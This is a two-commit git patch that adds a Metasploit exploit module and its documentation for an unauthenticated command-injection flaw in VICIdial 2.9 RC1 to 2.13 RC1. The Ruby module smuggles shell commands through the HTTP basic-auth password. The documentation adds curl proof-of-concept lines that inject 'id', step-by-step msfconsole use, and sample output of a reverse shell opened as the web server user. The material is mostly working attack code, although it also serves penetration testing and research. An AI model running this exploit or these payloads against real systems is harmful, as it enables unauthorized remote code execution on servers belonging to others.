From 018e544295cfb84db0699890d02a4fca290f8da8 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sat, 27 May 2017 05:09:38 +0000 Subject: [PATCH 1/2] Add VICIdial user_authorization Unauthenticated Command Execution module --- ...dial_user_authorization_unauth_cmd_exec.rb | 112 ++++++++++++++++++ 1 file changed, 112 insertions(+) create mode 100644 modules/exploits/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.rb diff --git a/modules/exploits/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.rb b/modules/exploits/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.rb new file mode 100644 index 0000000000..42f5bc6090 --- /dev/null +++ b/modules/exploits/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.rb @@ -0,0 +1,112 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'VICIdial user_authorization Unauthenticated Command Execution', + 'Description' => %q{ + This module exploits a vulnerability in VICIdial versions + 2.9 RC 1 to 2.13 RC1 which allows unauthenticated users + to execute arbitrary operating system commands as the web + server user if password encryption is enabled (disabled + by default). + + When password encryption is enabled the user's password + supplied using HTTP basic authentication is used in a call + to exec(). + + This module has been tested successfully on version 2.11 RC2 + and 2.13 RC1 on CentOS. + }, + 'License' => MSF_LICENSE, + 'Author' => 'Brendan Coles ', + 'References' => + [ + ['URL', 'http://www.vicidial.org/VICIDIALmantis/view.php?id=1016'] + ], + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Payload' => + { + # HTTP Basic authentication password + 'Space' => 2048, + # apostrophe ('), quote ("), semi-colon (;) and backslash (\) + # are removed by preg_replace + 'BadChars' => "\x00\x0A\x22\x27\x3B\x5C", + 'DisableNops' => true, + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic perl python netcat' + } + }, + 'Targets' => [[ 'Automatic Targeting', {} ]], + 'Privileged' => false, + 'DisclosureDate' => 'May 26 2017', + 'DefaultTarget' => 0)) + register_options([ OptString.new('TARGETURI', [true, 'The base path to VICIdial', '/vicidial/']) ]) + deregister_options('USERNAME', 'PASSWORD') + end + + def check + user = rand_text_alpha(rand(10) + 5) + pass = "#{rand_text_alpha(rand(10) + 5)}&#" + res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'vicidial_sales_viewer.php'), + 'authorization' => basic_auth(user, pass) + + unless res + vprint_status 'Connection failed' + return CheckCode::Unknown + end + + if res.code != 401 + vprint_status "#{peer} Unexpected reply. Expected authentication failure." + return CheckCode::Safe + end + + # Check for input filtering of '#' and '&' characters in password + # Response for invalid credentials is in the form of: |||BAD| + if res.body !~ /\|#{user}\|#{pass}\|BAD\|/ + vprint_status "#{peer} Target is patched." + return CheckCode::Safe + end + + # Check for ../agc/bp.pl password encryption script + res = send_request_cgi 'uri' => normalize_uri(target_uri.path, '..', 'agc', 'bp.pl') + if res && res.code == 200 && res.body =~ /Bcrypt password hashing script/ + vprint_status "#{peer} Password encryption is supported, but may not be enabled." + return CheckCode::Appears + end + + vprint_status "#{peer} Could not verify whether password encryption is supported." + CheckCode::Detected + end + + def execute_command(cmd, opts = {}) + user = rand_text_alpha(rand(10) + 5) + pass = "#{rand_text_alpha(rand(10) + 5)}& #{cmd} #" + + print_status "#{peer} Sending payload (#{cmd.length} bytes)" + res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'vicidial_sales_viewer.php'), + 'authorization' => basic_auth(user, pass) + + if !res + fail_with(Failure::Unreachable, 'Connection failed') + elsif res.code == 401 && res.body =~ /#{user}/ && res.body =~ /BAD/ + print_good "#{peer} Payload sent successfully" + else + fail_with(Failure::UnexpectedReply, 'Unexpected reply') + end + end + + def exploit + execute_command(payload.encoded) + end +end From dfb5806dcb623d11f9621961068181abb1badc6d Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sun, 28 May 2017 03:08:45 +0000 Subject: [PATCH 2/2] Add documentation --- ...dial_user_authorization_unauth_cmd_exec.md | 133 ++++++++++++++++++ 1 file changed, 133 insertions(+) create mode 100644 documentation/modules/exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.md diff --git a/documentation/modules/exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.md b/documentation/modules/exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.md new file mode 100644 index 0000000000..708867cde1 --- /dev/null +++ b/documentation/modules/exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.md @@ -0,0 +1,133 @@ +## Description + + This module exploits a vulnerability in VICIdial versions 2.9 RC1 to 2.13 RC1 which allows unauthenticated users to execute arbitrary operating system commands as the web server user if password encryption is enabled (disabled by default). + + When password encryption is enabled the user's password supplied using HTTP basic authentication is used in a call to `exec()`. + + This module has been tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS. + + +## Vulnerable Application + + VICIDIAL is a software suite that is designed to interact with the Asterisk Open-Source PBX Phone system to act as a complete inbound/outbound contact center suite with inbound email support as well. + + This module has been tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS. + + Installers: + + * [VICIdial 2.11 RC1](https://sourceforge.net/projects/astguiclient/files/astguiclient_2.11rc1.zip/download) + * [VICIdial 2.13 RC1](https://sourceforge.net/projects/astguiclient/files/astguiclient_2.13rc1.zip/download) + + Follow the [instructions to enabled password encryption](http://vicidial.org/docs/ENCRYPTED_PASSWORDS.txt). + + +## Technical Details + + The `functions.php` file defines a function called `user_authorization`: + + ```php + function user_authorization($user,$pass,$user_option,$user_update) + ``` + + This function is used throughout the application to validate user logon credentials supplied using HTTP basic authentication. If password encryption is enabled the user's password is passed to the `pass` argument of the `bp.pl` Perl script, without quotes, using PHP's `exec()` function: + + ```php + if ($SSpass_hash_enabled > 0) + { + if (file_exists("../agc/bp.pl")) + {$pass_hash = exec("../agc/bp.pl --pass=$pass");} + else + {$pass_hash = exec("../../agc/bp.pl --pass=$pass");} + ``` + + A rudimentary blacklist is used to prevent command injection. The apostrophe `'`, quote `"`, semi-colon `;` and backslash `\` characters are removed from the user's username and password using `preg_replace`, like so: + + ```php + $user = preg_replace("/\'|\"|\\\\|;/","",$user); + $pass = preg_replace("/\'|\"|\\\\|;/","",$pass); + ``` + + It is trivial to bypass the blacklist. + + For example, backticks ``` ` ```, pipe `|` or ampersand `&` are sufficient to bypass the blacklist and execute arbitrary operating system commands. + + For the purposes of exploitation, reaching the `user_authorization` function call with malicious input is hindered by additional input validation in use prior to the authentication check throughout the majority of the codebase: + + ```php + $PHP_AUTH_USER = preg_replace('/[^-_0-9a-zA-Z]/', '', $PHP_AUTH_USER); + $PHP_AUTH_PW = preg_replace('/[^-_0-9a-zA-Z]/', '', $PHP_AUTH_PW); + ``` + + However, in VICIdial version 2.11RC2, at least two files did not make use of the additional validation: + + * help.php + * vicidial_sales_viewer.php + + In VICIdial version 2.13RC1, at least one file did not make use of the additional validation: + + * vicidial_sales_viewer.php + + This vulnerability was patched in revision 2759. + + +## Proof of Concept + + ```bash + $ curl -isk "https://VICIdial.local/vicidial/vicidial_sales_viewer.php" \ + --user 'anyusername:anypassword& id>/tmp/pwned_by_sales_viewer #' + ``` + + ```bash + $ curl -isk "https://VICIdial.local/vicidial/help.php" \ + --user 'anyusername:anypassword& id>/tmp/pwned_by_help #' + ``` + + Note that `/tmp/pwned_by_help` and `/tmp/pwned_by_sales_viewer` files should contain the results of the `id` command. + + +## Verification Steps + + 1. Start `msfconsole` + 2. Do: `use exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec` + 3. Do: `set rhost [IP]` + 4. Do: `run` + 5. You should get a session + + +## Sample Output + + ``` + msf exploit(vicidial_user_authorization_unauth_cmd_exec) > check + [*] 172.16.191.150:80 The target appears to be vulnerable. + msf exploit(vicidial_user_authorization_unauth_cmd_exec) > run + + [*] Started reverse TCP handler on 172.16.191.181:4444 + [*] 172.16.191.150:80 Sending payload (505 bytes) + [+] 172.16.191.150:80 Payload sent successfully + [*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.150:36660) at 2017-05-27 01:00:41 -0400 + + id + uid=48(apache) gid=48(apache) groups=48(apache) + ``` + + +## Sample Output (Verbose) + + ``` + msf exploit(vicidial_user_authorization_unauth_cmd_exec) > set verbose true + verbose => true + msf exploit(vicidial_user_authorization_unauth_cmd_exec) > check + + [*] 172.16.191.150:80 Password encryption is supported, but may not be enabled. + [*] 172.16.191.150:80 The target appears to be vulnerable. + msf exploit(vicidial_user_authorization_unauth_cmd_exec) > run + + [*] Started reverse TCP handler on 172.16.191.181:4444 + [*] 172.16.191.150:80 Sending payload (505 bytes) + [+] 172.16.191.150:80 Payload sent successfully + [*] Command shell session 2 opened (172.16.191.181:4444 -> 172.16.191.150:36661) at 2017-05-27 01:00:48 -0400 + + id + uid=48(apache) gid=48(apache) groups=48(apache) + ``` +